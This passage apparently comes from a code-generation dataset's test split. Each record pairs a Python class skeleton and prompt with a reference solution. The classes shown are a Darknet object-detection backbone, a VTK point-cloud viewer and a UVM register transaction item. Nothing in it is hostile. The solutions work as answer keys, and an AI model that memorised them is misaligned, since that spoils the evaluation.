batch_norm=self.batch_norm, rep=5, index=index)\n index = self.conv_up1.index_out + 1\n self.conv_up2 = DarknetUpsampling(self.filters * 8, self.filters * 4, res_ch=self.filters * 8, batch_norm=self.batch_norm, rep=5, index=index)\n index = self.conv_up2.index_out + 1\n self.last_index = index\n<|end_body_0|>\n\n<|body_start_1|>\n x0 = self.conv0(x)\n x1 = self.conv1(x0)\n x2 = self.conv2(x1)\n x3 = self.conv3(x2)\n x4 = self.conv4(x3)\n x5 = self.conv5(x4)\n x_out1 = self.conv_low(x5)\n x_out2 = self.conv_up1(x_out1, x_res=x4)\n x_out3 = self.conv_up2(x_out2, x_res=x3)\n return (x_out1, x_out2, x_out3)\n<|end_body_1|>\n", "class_docstring": "Darknet body class", "class_name": "Darknet", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass Darknet:\n \"\"\"Darknet body class\"\"\"\n\n def __init__(self, in_ch, filters=32, batch_norm=True):\n \"\"\"Constructor\"\"\"\n <|body_0|>\n\n def forward(self, x):\n \"\"\"Foward method\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n super(Darknet, self).__init__()\n self.in_channels = in_ch\n self.batch_norm = batch_norm\n self.filters = filters\n self.stride_out_1 = 32\n self.stride_out_2 = 16\n self.stride_out_3 = 8\n index = 0\n self.first_index = 0\n self.conv0 = DarknetConvBlock(self.in_channels, self.filters, kernel_size=3, stride=1, padding=1, batch_norm=self.batch_norm, index=index)\n index += 1\n self.conv1 = DarknetBlock(self.filters, self.filters * 2, batch_norm=self.batch_norm, rep=1, index=index)\n index = self.conv1.index_out + 1\n self.conv2 = DarknetBlock(self.filters * 2, self.filters * 4, batch_norm=self.batch_norm, rep=2, index=index)\n index = self.conv2.index_out + 1\n self.conv3 = DarknetBlock(self.filters * 4, self.filters * 8, batch_norm=self.batch_norm, rep=8, index=index)\n index = self.conv3.index_out + 1\n self.conv4 = DarknetBlock(self.filters * 8, self.filters * 16, batch_norm=self.batch_norm, rep=8, index=index)\n index = self.conv4.index_out + 1\n self.conv5 = DarknetBlock(self.filters * 16, self.filters * 32, batch_norm=self.batch_norm, rep=4, index=index)\n index = self.conv5.index_out + 1\n self.conv_low = DarknetLoopBlock(self.filters * 32, self.filters * 16, batch_norm=self.batch_norm, rep=5, index=index)\n index = self.conv_low.index_out + 1\n self.conv_up1 = DarknetUpsampling(self.filters * 16, self.filters * 8, res_ch=self.filters * 16, batch_norm=self.batch_norm, rep=5, index=index)\n index = self.conv_up1.index_out + 1\n self.conv_up2 = DarknetUpsampling(self.filters * 8, self.filters * 4, res_ch=self.filters * 8, batch_norm=self.batch_norm, rep=5, index=index)\n index = self.conv_up2.index_out + 1\n self.last_index = index\n<|end_body_0|>\n\n<|body_start_1|>\n x0 = self.conv0(x)\n x1 = self.conv1(x0)\n x2 = self.conv2(x1)\n x3 = self.conv3(x2)\n x4 = self.conv4(x3)\n x5 = self.conv5(x4)\n x_out1 = self.conv_low(x5)\n x_out2 = self.conv_up1(x_out1, x_res=x4)\n x_out3 = self.conv_up2(x_out2, x_res=x3)\n return (x_out1, x_out2, x_out3)\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000110", "length_bytes": 28014, "license_type": "no_license", "methods": [{"docstring": "Constructor", "name": "__init__", "signature": "def __init__(self, in_ch, filters=32, batch_norm=True)"}, {"docstring": "Foward method", "name": "forward", "signature": "def forward(self, x)"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_train_004288", "prompt": "Implement the Python class `Darknet` described below.\n\nClass 
description:\nDarknet body class\n\nMethod signatures and docstrings:\n- def __init__(self, in_ch, filters=32, batch_norm=True): Constructor\n- def forward(self, x): Foward method", "prompted_full_text": "Implement the Python class `Darknet` described below.\n\nClass description:\nDarknet body class\n\nMethod signatures and docstrings:\n- def __init__(self, in_ch, filters=32, batch_norm=True): Constructor\n- def forward(self, x): Foward method\n\n<|skeleton|>\nclass Darknet:\n \"\"\"Darknet body class\"\"\"\n\n def __init__(self, in_ch, filters=32, batch_norm=True):\n \"\"\"Constructor\"\"\"\n <|body_0|>\n\n def forward(self, x):\n \"\"\"Foward method\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n super(Darknet, self).__init__()\n self.in_channels = in_ch\n self.batch_norm = batch_norm\n self.filters = filters\n self.stride_out_1 = 32\n self.stride_out_2 = 16\n self.stride_out_3 = 8\n index = 0\n self.first_index = 0\n self.conv0 = DarknetConvBlock(self.in_channels, self.filters, kernel_size=3, stride=1, padding=1, batch_norm=self.batch_norm, index=index)\n index += 1\n self.conv1 = DarknetBlock(self.filters, self.filters * 2, batch_norm=self.batch_norm, rep=1, index=index)\n index = self.conv1.index_out + 1\n self.conv2 = DarknetBlock(self.filters * 2, self.filters * 4, batch_norm=self.batch_norm, rep=2, index=index)\n index = self.conv2.index_out + 1\n self.conv3 = DarknetBlock(self.filters * 4, self.filters * 8, batch_norm=self.batch_norm, rep=8, index=index)\n index = self.conv3.index_out + 1\n self.conv4 = DarknetBlock(self.filters * 8, self.filters * 16, batch_norm=self.batch_norm, rep=8, index=index)\n index = self.conv4.index_out + 1\n self.conv5 = DarknetBlock(self.filters * 16, self.filters * 32, batch_norm=self.batch_norm, rep=4, index=index)\n index = self.conv5.index_out + 1\n self.conv_low = DarknetLoopBlock(self.filters * 32, self.filters * 16, batch_norm=self.batch_norm, rep=5, index=index)\n index = self.conv_low.index_out + 1\n self.conv_up1 = DarknetUpsampling(self.filters * 16, self.filters * 8, res_ch=self.filters * 16, batch_norm=self.batch_norm, rep=5, index=index)\n index = self.conv_up1.index_out + 1\n self.conv_up2 = DarknetUpsampling(self.filters * 8, self.filters * 4, res_ch=self.filters * 8, batch_norm=self.batch_norm, rep=5, index=index)\n index = self.conv_up2.index_out + 1\n self.last_index = index\n<|end_body_0|>\n\n<|body_start_1|>\n x0 = self.conv0(x)\n x1 = self.conv1(x0)\n x2 = self.conv2(x1)\n x3 = self.conv3(x2)\n x4 = self.conv4(x3)\n x5 = self.conv5(x4)\n x_out1 = self.conv_low(x5)\n x_out2 = self.conv_up1(x_out1, x_res=x4)\n x_out3 = self.conv_up2(x_out2, x_res=x3)\n return (x_out1, x_out2, x_out3)\n<|end_body_1|>\n", "revision_id": "69edb5ecd569395086cf610df9c8aa345284259a", "skeleton": "<|skeleton|>\nclass Darknet:\n \"\"\"Darknet body class\"\"\"\n\n def __init__(self, in_ch, filters=32, batch_norm=True):\n \"\"\"Constructor\"\"\"\n <|body_0|>\n\n def forward(self, x):\n \"\"\"Foward method\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class Darknet:\n \"\"\"Darknet body class\"\"\"\n\n def __init__(self, in_ch, filters=32, batch_norm=True):\n \"\"\"Constructor\"\"\"\n super(Darknet, self).__init__()\n self.in_channels = in_ch\n self.batch_norm = batch_norm\n self.filters = filters\n self.stride_out_1 = 32\n self.stride_out_2 = 16\n self.stride_out_3 = 8\n index = 0\n self.first_index = 0\n self.conv0 = 
DarknetConvBlock(self.in_channels, self.filters, kernel_size=3, stride=1, padding=1, batch_norm=self.batch_norm, index=index)\n index += 1\n self.conv1 = DarknetBlock(self.filters, self.filters * 2, batch_norm=self.batch_norm, rep=1, index=index)\n index = self.conv1.index_out + 1\n self.conv2 = DarknetBlock(self.filters * 2, self.filters * 4, batch_norm=self.batch_norm, rep=2, index=index)\n index = self.conv2.index_out + 1\n self.conv3 = DarknetBlock(self.filters * 4, self.filters * 8, batch_norm=self.batch_norm, rep=8, index=index)\n index = self.conv3.index_out + 1\n self.conv4 = DarknetBlock(self.filters * 8, self.filters * 16, batch_norm=self.batch_norm, rep=8, index=index)\n index = self.conv4.index_out + 1\n self.conv5 = DarknetBlock(self.filters * 16, self.filters * 32, batch_norm=self.batch_norm, rep=4, index=index)\n index = self.conv5.index_out + 1\n self.conv_low = DarknetLoopBlock(self.filters * 32, self.filters * 16, batch_norm=self.batch_norm, rep=5, index=index)\n index = self.conv_low.index_out + 1\n self.conv_up1 = DarknetUpsampling(self.filters * 16, self.filters * 8, res_ch=self.filters * 16, batch_norm=self.batch_norm, rep=5, index=index)\n index = self.conv_up1.index_out + 1\n self.conv_up2 = DarknetUpsampling(self.filters * 8, self.filters * 4, res_ch=self.filters * 8, batch_norm=self.batch_norm, rep=5, index=index)\n index = self.conv_up2.index_out + 1\n self.last_index = index\n\n def forward(self, x):\n \"\"\"Foward method\"\"\"\n x0 = self.conv0(x)\n x1 = self.conv1(x0)\n x2 = self.conv2(x1)\n x3 = self.conv3(x2)\n x4 = self.conv4(x3)\n x5 = self.conv5(x4)\n x_out1 = self.conv_low(x5)\n x_out2 = self.conv_up1(x_out1, x_res=x4)\n x_out3 = self.conv_up2(x_out2, x_res=x3)\n return (x_out1, x_out2, x_out3)\n", "source": "the_stack_v2_python_sparse", "source_path": "python/models/modules.py", "source_repo": "dswanderley/detntorch", "split": "test", "star_events_count": 2} {"blob_id": "90acc4c6f64af9f0513417fca149d619450bc5c7", "bodies": ["self.name = name\nself.pos = []\nself.Pn = []\nself.flux = []\nself.pointCloud = []\nself.readpil3d()", "res = np.loadtxt(self.name, delimiter=' ')\nself.pos = res[:, 0:3]\nself.Pn = res[:, 3:4]\nself.flux = res[:, -1]", "self.pointCloud = VtkPointCloud()\nfor k in range(np.size(self.pos, 0)):\n self.pointCloud.addPoint(self.pos[k, :])\nrenderer = vtk.vtkRenderer()\nrenderer.AddActor(self.pointCloud.vtkActor)\nrenderer.SetBackground(0.2, 0.3, 0.4)\nrenderer.SetBackground(0.0, 0.0, 0.0)\nrenderer.ResetCamera()\nrenderWindow = vtk.vtkRenderWindow()\nrenderWindow.AddRenderer(renderer)\nrenderWindowInteractor = vtk.vtkRenderWindowInteractor()\nrenderWindowInteractor.SetRenderWindow(renderWindow)\nrenderWindow.Render()\nrenderWindow.SetWindowName('XYZ Data Viewer: ')\nrenderWindowInteractor.Start()"], "bodies_text": "<|body_start_0|>\n self.name = name\n self.pos = []\n self.Pn = []\n self.flux = []\n self.pointCloud = []\n self.readpil3d()\n<|end_body_0|>\n\n<|body_start_1|>\n res = np.loadtxt(self.name, delimiter=' ')\n self.pos = res[:, 0:3]\n self.Pn = res[:, 3:4]\n self.flux = res[:, -1]\n<|end_body_1|>\n\n<|body_start_2|>\n self.pointCloud = VtkPointCloud()\n for k in range(np.size(self.pos, 0)):\n self.pointCloud.addPoint(self.pos[k, :])\n renderer = vtk.vtkRenderer()\n renderer.AddActor(self.pointCloud.vtkActor)\n renderer.SetBackground(0.2, 0.3, 0.4)\n renderer.SetBackground(0.0, 0.0, 0.0)\n renderer.ResetCamera()\n renderWindow = vtk.vtkRenderWindow()\n renderWindow.AddRenderer(renderer)\n renderWindowInteractor = 
vtk.vtkRenderWindowInteractor()\n renderWindowInteractor.SetRenderWindow(renderWindow)\n renderWindow.Render()\n renderWindow.SetWindowName('XYZ Data Viewer: ')\n renderWindowInteractor.Start()\n<|end_body_2|>\n", "class_docstring": "Class representing a PILAGER3D output file.", "class_name": "PIL3D", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass PIL3D:\n \"\"\"Class representing a PILAGER3D output file.\"\"\"\n\n def __init__(self, name):\n \"\"\"Method to initialize class.\"\"\"\n <|body_0|>\n\n def readpil3d(self):\n \"\"\"Method to read in the pil3d txt file.\"\"\"\n <|body_1|>\n\n def make_point_cloud(self):\n \"\"\"Method to plot the point cloud.\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.name = name\n self.pos = []\n self.Pn = []\n self.flux = []\n self.pointCloud = []\n self.readpil3d()\n<|end_body_0|>\n\n<|body_start_1|>\n res = np.loadtxt(self.name, delimiter=' ')\n self.pos = res[:, 0:3]\n self.Pn = res[:, 3:4]\n self.flux = res[:, -1]\n<|end_body_1|>\n\n<|body_start_2|>\n self.pointCloud = VtkPointCloud()\n for k in range(np.size(self.pos, 0)):\n self.pointCloud.addPoint(self.pos[k, :])\n renderer = vtk.vtkRenderer()\n renderer.AddActor(self.pointCloud.vtkActor)\n renderer.SetBackground(0.2, 0.3, 0.4)\n renderer.SetBackground(0.0, 0.0, 0.0)\n renderer.ResetCamera()\n renderWindow = vtk.vtkRenderWindow()\n renderWindow.AddRenderer(renderer)\n renderWindowInteractor = vtk.vtkRenderWindowInteractor()\n renderWindowInteractor.SetRenderWindow(renderWindow)\n renderWindow.Render()\n renderWindow.SetWindowName('XYZ Data Viewer: ')\n renderWindowInteractor.Start()\n<|end_body_2|>\n", "id": "stack_v2_sparse_classes_10k_test_000111", "length_bytes": 3136, "license_type": "no_license", "methods": [{"docstring": "Method to initialize class.", "name": "__init__", "signature": "def __init__(self, name)"}, {"docstring": "Method to read in the pil3d txt file.", "name": "readpil3d", "signature": "def readpil3d(self)"}, {"docstring": "Method to plot the point cloud.", "name": "make_point_cloud", "signature": "def make_point_cloud(self)"}], "n_methods": 3, "original_id": "stack_v2_sparse_classes_30k_train_001929", "prompt": "Implement the Python class `PIL3D` described below.\n\nClass description:\nClass representing a PILAGER3D output file.\n\nMethod signatures and docstrings:\n- def __init__(self, name): Method to initialize class.\n- def readpil3d(self): Method to read in the pil3d txt file.\n- def make_point_cloud(self): Method to plot the point cloud.", "prompted_full_text": "Implement the Python class `PIL3D` described below.\n\nClass description:\nClass representing a PILAGER3D output file.\n\nMethod signatures and docstrings:\n- def __init__(self, name): Method to initialize class.\n- def readpil3d(self): Method to read in the pil3d txt file.\n- def make_point_cloud(self): Method to plot the point cloud.\n\n<|skeleton|>\nclass PIL3D:\n \"\"\"Class representing a PILAGER3D output file.\"\"\"\n\n def __init__(self, name):\n \"\"\"Method to initialize class.\"\"\"\n <|body_0|>\n\n def readpil3d(self):\n \"\"\"Method to read in the pil3d txt file.\"\"\"\n <|body_1|>\n\n def make_point_cloud(self):\n \"\"\"Method to plot the point cloud.\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.name = name\n self.pos = []\n self.Pn = []\n self.flux = []\n self.pointCloud = []\n self.readpil3d()\n<|end_body_0|>\n\n<|body_start_1|>\n res = np.loadtxt(self.name, delimiter=' ')\n self.pos = res[:, 
0:3]\n self.Pn = res[:, 3:4]\n self.flux = res[:, -1]\n<|end_body_1|>\n\n<|body_start_2|>\n self.pointCloud = VtkPointCloud()\n for k in range(np.size(self.pos, 0)):\n self.pointCloud.addPoint(self.pos[k, :])\n renderer = vtk.vtkRenderer()\n renderer.AddActor(self.pointCloud.vtkActor)\n renderer.SetBackground(0.2, 0.3, 0.4)\n renderer.SetBackground(0.0, 0.0, 0.0)\n renderer.ResetCamera()\n renderWindow = vtk.vtkRenderWindow()\n renderWindow.AddRenderer(renderer)\n renderWindowInteractor = vtk.vtkRenderWindowInteractor()\n renderWindowInteractor.SetRenderWindow(renderWindow)\n renderWindow.Render()\n renderWindow.SetWindowName('XYZ Data Viewer: ')\n renderWindowInteractor.Start()\n<|end_body_2|>\n", "revision_id": "6b37842203ff4318a48dbf0258cbe2b253436e7d", "skeleton": "<|skeleton|>\nclass PIL3D:\n \"\"\"Class representing a PILAGER3D output file.\"\"\"\n\n def __init__(self, name):\n \"\"\"Method to initialize class.\"\"\"\n <|body_0|>\n\n def readpil3d(self):\n \"\"\"Method to read in the pil3d txt file.\"\"\"\n <|body_1|>\n\n def make_point_cloud(self):\n \"\"\"Method to plot the point cloud.\"\"\"\n <|body_2|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class PIL3D:\n \"\"\"Class representing a PILAGER3D output file.\"\"\"\n\n def __init__(self, name):\n \"\"\"Method to initialize class.\"\"\"\n self.name = name\n self.pos = []\n self.Pn = []\n self.flux = []\n self.pointCloud = []\n self.readpil3d()\n\n def readpil3d(self):\n \"\"\"Method to read in the pil3d txt file.\"\"\"\n res = np.loadtxt(self.name, delimiter=' ')\n self.pos = res[:, 0:3]\n self.Pn = res[:, 3:4]\n self.flux = res[:, -1]\n\n def make_point_cloud(self):\n \"\"\"Method to plot the point cloud.\"\"\"\n self.pointCloud = VtkPointCloud()\n for k in range(np.size(self.pos, 0)):\n self.pointCloud.addPoint(self.pos[k, :])\n renderer = vtk.vtkRenderer()\n renderer.AddActor(self.pointCloud.vtkActor)\n renderer.SetBackground(0.2, 0.3, 0.4)\n renderer.SetBackground(0.0, 0.0, 0.0)\n renderer.ResetCamera()\n renderWindow = vtk.vtkRenderWindow()\n renderWindow.AddRenderer(renderer)\n renderWindowInteractor = vtk.vtkRenderWindowInteractor()\n renderWindowInteractor.SetRenderWindow(renderWindow)\n renderWindow.Render()\n renderWindow.SetWindowName('XYZ Data Viewer: ')\n renderWindowInteractor.Start()\n", "source": "the_stack_v2_python_sparse", "source_path": "plume/pil3d.py", "source_repo": "tslowery78/PyLnD", "split": "test", "star_events_count": 0} {"blob_id": "46fbc83852d00ff2a80b2b00ffcb099e9e96064f", "bodies": ["UVMSequenceItem.__init__(self, name)\nself.value: List[int] = [0]\nself.path = UVM_FRONTDOOR\nself.status = 0\nself.fname = ''\nself.lineno = 0\nself.bd_kind = ''\nself.prior = -1\nself.extension = None\nself.parent = None\nself.offset = 0\nself.kind = UVM_READ\nself.element = None\nself.element_kind = -1\nself.map = None\nself.local_map = None", "value_s = ''\nele_name = 'null'\nif self.element is not None:\n ele_name = self.element.get_full_name()\nkind_str = UVM_ACCESS_NAMES[self.kind]\nelement_kind_str = UVM_ELEMENT_KIND_NAMES[self.element_kind]\ns = 'kind=' + kind_str + ' ele_kind=' + element_kind_str + ' ele_name=' + ele_name\nif len(self.value) > 1 and uvm_report_enabled(UVM_HIGH, UVM_INFO, 'RegModel'):\n value_s = \"'{\"\n for i in range(len(self.value)):\n value_s = value_s + sv.sformatf('%0h,', self.value[i])\n value_s = value_s[:-1] + '}'\nelse:\n value_s = sv.sformatf('%0h', self.value[0])\ns = s + ' value=' + 
value_s\nif self.element_kind == UVM_MEM:\n s = s + sv.sformatf(' offset=%0h', self.offset)\nmap_name = 'null'\nif self.map is not None:\n map_name = self.map.get_full_name()\ns = s + ' map=' + map_name + ' path=' + str(self.path)\ns = s + ' status=' + str(self.status)\nreturn s", "if rhs is None:\n uvm_fatal('REG/NULL', 'do_copy: rhs argument is null')\narr_rhs_ = []\nif not sv.cast(arr_rhs_, rhs, UVMRegItem):\n uvm_error('WRONG_TYPE', 'Provided rhs is not of type uvm_reg_item')\n return\nrhs_ = arr_rhs_[0]\nsuper().copy(rhs)\nself.element_kind = rhs_.element_kind\nself.element = rhs_.element\nself.kind = rhs_.kind\nself.value = rhs_.value\nself.offset = rhs_.offset\nself.status = rhs_.status\nself.local_map = rhs_.local_map\nself.map = rhs_.map\nself.path = rhs_.path\nself.extension = rhs_.extension\nself.bd_kind = rhs_.bd_kind\nself.parent = rhs_.parent\nself.prior = rhs_.prior\nself.fname = rhs_.fname\nself.lineno = rhs_.lineno"], "bodies_text": "<|body_start_0|>\n UVMSequenceItem.__init__(self, name)\n self.value: List[int] = [0]\n self.path = UVM_FRONTDOOR\n self.status = 0\n self.fname = ''\n self.lineno = 0\n self.bd_kind = ''\n self.prior = -1\n self.extension = None\n self.parent = None\n self.offset = 0\n self.kind = UVM_READ\n self.element = None\n self.element_kind = -1\n self.map = None\n self.local_map = None\n<|end_body_0|>\n\n<|body_start_1|>\n value_s = ''\n ele_name = 'null'\n if self.element is not None:\n ele_name = self.element.get_full_name()\n kind_str = UVM_ACCESS_NAMES[self.kind]\n element_kind_str = UVM_ELEMENT_KIND_NAMES[self.element_kind]\n s = 'kind=' + kind_str + ' ele_kind=' + element_kind_str + ' ele_name=' + ele_name\n if len(self.value) > 1 and uvm_report_enabled(UVM_HIGH, UVM_INFO, 'RegModel'):\n value_s = \"'{\"\n for i in range(len(self.value)):\n value_s = value_s + sv.sformatf('%0h,', self.value[i])\n value_s = value_s[:-1] + '}'\n else:\n value_s = sv.sformatf('%0h', self.value[0])\n s = s + ' value=' + value_s\n if self.element_kind == UVM_MEM:\n s = s + sv.sformatf(' offset=%0h', self.offset)\n map_name = 'null'\n if self.map is not None:\n map_name = self.map.get_full_name()\n s = s + ' map=' + map_name + ' path=' + str(self.path)\n s = s + ' status=' + str(self.status)\n return s\n<|end_body_1|>\n\n<|body_start_2|>\n if rhs is None:\n uvm_fatal('REG/NULL', 'do_copy: rhs argument is null')\n arr_rhs_ = []\n if not sv.cast(arr_rhs_, rhs, UVMRegItem):\n uvm_error('WRONG_TYPE', 'Provided rhs is not of type uvm_reg_item')\n return\n rhs_ = arr_rhs_[0]\n super().copy(rhs)\n self.element_kind = rhs_.element_kind\n self.element = rhs_.element\n self.kind = rhs_.kind\n self.value = rhs_.value\n self.offset = rhs_.offset\n self.status = rhs_.status\n self.local_map = rhs_.local_map\n self.map = rhs_.map\n self.path = rhs_.path\n self.extension = rhs_.extension\n self.bd_kind = rhs_.bd_kind\n self.parent = rhs_.parent\n self.prior = rhs_.prior\n self.fname = rhs_.fname\n self.lineno = rhs_.lineno\n<|end_body_2|>\n", "class_docstring": "CLASS: UVMRegItem Defines an abstract register transaction item. No bus-specific information is present, although a handle to a `UVMRegMap` is provided in case a user wishes to implement a custom address translation algorithm.", "class_name": "UVMRegItem", "detected_licenses": ["Apache-2.0"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass UVMRegItem:\n \"\"\"CLASS: UVMRegItem Defines an abstract register transaction item. 
No bus-specific information is present, although a handle to a `UVMRegMap` is provided in case a user wishes to implement a custom address translation algorithm.\"\"\"\n\n def __init__(self, name='') -> None:\n \"\"\"Create a new instance of this type, giving it the optional `name`. Args: name (str): Name of the instance\"\"\"\n <|body_0|>\n\n def convert2string(self) -> str:\n \"\"\"Function: convert2string Returns a string showing the contents of this transaction. Returns: str: Reg item as string.\"\"\"\n <|body_1|>\n\n def do_copy(self, rhs) -> None:\n \"\"\"Function: do_copy Copy the ~rhs~ object into this object. The ~rhs~ object must derive from `UVMRegItem`.\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n UVMSequenceItem.__init__(self, name)\n self.value: List[int] = [0]\n self.path = UVM_FRONTDOOR\n self.status = 0\n self.fname = ''\n self.lineno = 0\n self.bd_kind = ''\n self.prior = -1\n self.extension = None\n self.parent = None\n self.offset = 0\n self.kind = UVM_READ\n self.element = None\n self.element_kind = -1\n self.map = None\n self.local_map = None\n<|end_body_0|>\n\n<|body_start_1|>\n value_s = ''\n ele_name = 'null'\n if self.element is not None:\n ele_name = self.element.get_full_name()\n kind_str = UVM_ACCESS_NAMES[self.kind]\n element_kind_str = UVM_ELEMENT_KIND_NAMES[self.element_kind]\n s = 'kind=' + kind_str + ' ele_kind=' + element_kind_str + ' ele_name=' + ele_name\n if len(self.value) > 1 and uvm_report_enabled(UVM_HIGH, UVM_INFO, 'RegModel'):\n value_s = \"'{\"\n for i in range(len(self.value)):\n value_s = value_s + sv.sformatf('%0h,', self.value[i])\n value_s = value_s[:-1] + '}'\n else:\n value_s = sv.sformatf('%0h', self.value[0])\n s = s + ' value=' + value_s\n if self.element_kind == UVM_MEM:\n s = s + sv.sformatf(' offset=%0h', self.offset)\n map_name = 'null'\n if self.map is not None:\n map_name = self.map.get_full_name()\n s = s + ' map=' + map_name + ' path=' + str(self.path)\n s = s + ' status=' + str(self.status)\n return s\n<|end_body_1|>\n\n<|body_start_2|>\n if rhs is None:\n uvm_fatal('REG/NULL', 'do_copy: rhs argument is null')\n arr_rhs_ = []\n if not sv.cast(arr_rhs_, rhs, UVMRegItem):\n uvm_error('WRONG_TYPE', 'Provided rhs is not of type uvm_reg_item')\n return\n rhs_ = arr_rhs_[0]\n super().copy(rhs)\n self.element_kind = rhs_.element_kind\n self.element = rhs_.element\n self.kind = rhs_.kind\n self.value = rhs_.value\n self.offset = rhs_.offset\n self.status = rhs_.status\n self.local_map = rhs_.local_map\n self.map = rhs_.map\n self.path = rhs_.path\n self.extension = rhs_.extension\n self.bd_kind = rhs_.bd_kind\n self.parent = rhs_.parent\n self.prior = rhs_.prior\n self.fname = rhs_.fname\n self.lineno = rhs_.lineno\n<|end_body_2|>\n", "id": "stack_v2_sparse_classes_10k_test_000112", "length_bytes": 9874, "license_type": "permissive", "methods": [{"docstring": "Create a new instance of this type, giving it the optional `name`. Args: name (str): Name of the instance", "name": "__init__", "signature": "def __init__(self, name='') -> None"}, {"docstring": "Function: convert2string Returns a string showing the contents of this transaction. Returns: str: Reg item as string.", "name": "convert2string", "signature": "def convert2string(self) -> str"}, {"docstring": "Function: do_copy Copy the ~rhs~ object into this object. 
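The convert2string body just shown prints self.value either as one hex word or, when the item carries several words and RegModel verbosity is high enough, as a SystemVerilog-style '{a,b,c} literal assembled with sv.sformatf('%0h', ...). A rough plain-Python rendering of only that formatting step; using format(v, 'x') for sv.sformatf's %0h is an assumption, and the uvm_report_enabled verbosity gate is deliberately omitted.

def value_to_string(values):
    # several words print as a SystemVerilog-style literal: '{a,b,c}
    if len(values) > 1:
        return "'{" + ",".join(format(v, "x") for v in values) + "}"
    return format(values[0], "x")      # single word: bare hex digits

print(value_to_string([0xDEADBEEF]))   # deadbeef
print(value_to_string([1, 2, 255]))    # '{1,2,ff}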
The ~rhs~ object must derive from `UVMRegItem`.", "name": "do_copy", "signature": "def do_copy(self, rhs) -> None"}], "n_methods": 3, "prompt": "Implement the Python class `UVMRegItem` described below.\n\nClass description:\nCLASS: UVMRegItem Defines an abstract register transaction item. No bus-specific information is present, although a handle to a `UVMRegMap` is provided in case a user wishes to implement a custom address translation algorithm.\n\nMethod signatures and docstrings:\n- def __init__(self, name='') -> None: Create a new instance of this type, giving it the optional `name`. Args: name (str): Name of the instance\n- def convert2string(self) -> str: Function: convert2string Returns a string showing the contents of this transaction. Returns: str: Reg item as string.\n- def do_copy(self, rhs) -> None: Function: do_copy Copy the ~rhs~ object into this object. The ~rhs~ object must derive from `UVMRegItem`.", "prompted_full_text": "Implement the Python class `UVMRegItem` described below.\n\nClass description:\nCLASS: UVMRegItem Defines an abstract register transaction item. No bus-specific information is present, although a handle to a `UVMRegMap` is provided in case a user wishes to implement a custom address translation algorithm.\n\nMethod signatures and docstrings:\n- def __init__(self, name='') -> None: Create a new instance of this type, giving it the optional `name`. Args: name (str): Name of the instance\n- def convert2string(self) -> str: Function: convert2string Returns a string showing the contents of this transaction. Returns: str: Reg item as string.\n- def do_copy(self, rhs) -> None: Function: do_copy Copy the ~rhs~ object into this object. The ~rhs~ object must derive from `UVMRegItem`.\n\n<|skeleton|>\nclass UVMRegItem:\n \"\"\"CLASS: UVMRegItem Defines an abstract register transaction item. No bus-specific information is present, although a handle to a `UVMRegMap` is provided in case a user wishes to implement a custom address translation algorithm.\"\"\"\n\n def __init__(self, name='') -> None:\n \"\"\"Create a new instance of this type, giving it the optional `name`. Args: name (str): Name of the instance\"\"\"\n <|body_0|>\n\n def convert2string(self) -> str:\n \"\"\"Function: convert2string Returns a string showing the contents of this transaction. Returns: str: Reg item as string.\"\"\"\n <|body_1|>\n\n def do_copy(self, rhs) -> None:\n \"\"\"Function: do_copy Copy the ~rhs~ object into this object. 
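do_copy relies on uvm-python's sv.cast taking a list as its destination: the call reports success as a bool and, on success, deposits the cast handle into the list, mimicking SystemVerilog's $cast. A plain-Python stand-in for that calling convention is sketched below; the stand-in itself is an assumption, and only the usage shape (empty list in, rhs_ = arr_rhs_[0] out) comes from the record.

def sv_cast(dest, obj, typ):
    # behave like SystemVerilog $cast: append and succeed only on a type match
    if isinstance(obj, typ):
        dest.append(obj)
        return True
    return False

class RegItemBase:
    pass

class RegItem(RegItemBase):
    pass

out = []
if not sv_cast(out, RegItem(), RegItemBase):
    raise TypeError('Provided rhs is not of the expected type')
rhs_ = out[0]                          # same unpacking step as in do_copy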
The ~rhs~ object must derive from `UVMRegItem`.\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n UVMSequenceItem.__init__(self, name)\n self.value: List[int] = [0]\n self.path = UVM_FRONTDOOR\n self.status = 0\n self.fname = ''\n self.lineno = 0\n self.bd_kind = ''\n self.prior = -1\n self.extension = None\n self.parent = None\n self.offset = 0\n self.kind = UVM_READ\n self.element = None\n self.element_kind = -1\n self.map = None\n self.local_map = None\n<|end_body_0|>\n\n<|body_start_1|>\n value_s = ''\n ele_name = 'null'\n if self.element is not None:\n ele_name = self.element.get_full_name()\n kind_str = UVM_ACCESS_NAMES[self.kind]\n element_kind_str = UVM_ELEMENT_KIND_NAMES[self.element_kind]\n s = 'kind=' + kind_str + ' ele_kind=' + element_kind_str + ' ele_name=' + ele_name\n if len(self.value) > 1 and uvm_report_enabled(UVM_HIGH, UVM_INFO, 'RegModel'):\n value_s = \"'{\"\n for i in range(len(self.value)):\n value_s = value_s + sv.sformatf('%0h,', self.value[i])\n value_s = value_s[:-1] + '}'\n else:\n value_s = sv.sformatf('%0h', self.value[0])\n s = s + ' value=' + value_s\n if self.element_kind == UVM_MEM:\n s = s + sv.sformatf(' offset=%0h', self.offset)\n map_name = 'null'\n if self.map is not None:\n map_name = self.map.get_full_name()\n s = s + ' map=' + map_name + ' path=' + str(self.path)\n s = s + ' status=' + str(self.status)\n return s\n<|end_body_1|>\n\n<|body_start_2|>\n if rhs is None:\n uvm_fatal('REG/NULL', 'do_copy: rhs argument is null')\n arr_rhs_ = []\n if not sv.cast(arr_rhs_, rhs, UVMRegItem):\n uvm_error('WRONG_TYPE', 'Provided rhs is 